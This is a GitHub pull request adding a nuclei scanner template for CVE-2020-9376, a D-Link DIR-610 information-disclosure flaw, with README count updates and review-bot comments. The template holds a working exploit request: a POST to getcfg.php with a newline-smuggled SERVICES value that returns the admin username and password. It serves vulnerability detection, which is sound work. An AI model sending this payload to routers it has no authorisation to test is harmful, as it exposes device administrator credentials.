Merge pull request #749 from projectdiscovery/CVE-2020-9376

Adding CVE-2020-9376
patch-1
PD-Team 2021-01-12 21:46:49 +05:30 committed by GitHub
commit ae81785b2d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 2 deletions

@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 154 | default-logins | 8 |
| cves | 155 | default-logins | 8 |
| dns | 6 | exposed-panels | 72 |
| exposed-tokens | 9 | exposures | 40 |
| fuzzing | 5 | helpers | 3 |
@ -205,6 +205,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── CVE-2020-8982.yaml
│   ├── CVE-2020-9047.yaml
│   ├── CVE-2020-9344.yaml
│   ├── CVE-2020-9376.yaml
│   ├── CVE-2020-9484.yaml
│   ├── CVE-2020-9496.yaml
│   └── CVE-2020-9757.yaml
@ -575,7 +576,7 @@ An overview of the nuclei template directory including number of templates assoc
</details>
**53 directories, 475 files**.
**53 directories, 476 files**.
📖 Documentation
-----
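Review bot: the total on the `**53 directories, 476 files**` line is edited by hand, as is the `cves` count in the table earlier in this file, so both have to be kept in step with the tree listing on every template PR. Each moves by one here, which matches the single `CVE-2020-9376.yaml` entry added to the tree, but generating these figures from the directory as part of CI would remove the chance of them drifting apart.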

@ -0,0 +1,35 @@
id: CVE-2020-9376
info:
name: D-Link Information Disclosure via getcfg.php
author: whynotke
severity: high
description: |
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-9376
requests:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<name>Admin</name>"
- "</usrid>"
- "</password>"
condition: and
part: body
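Review bot: the word matcher requires the literal `<name>Admin</name>` alongside `</usrid>` and `</password>` under `condition: and`, so a device whose account carries any other name would return the same disclosure and go unreported. Consider matching on the structural tags only (`</usrid>` and `</password>`), or a regex on the `<name>` element, while keeping the status 200 check. Separately, `References:` and the NVD link follow directly after the `description: |` text; if they sit inside that block scalar they become part of the description string, and a dedicated `reference:` key under `info` would keep the link machine-readable. The request body writes `%0a` where the description writes `%0A`; both decode to the same newline, but using one spelling in both places avoids a reader wondering whether the difference is intentional.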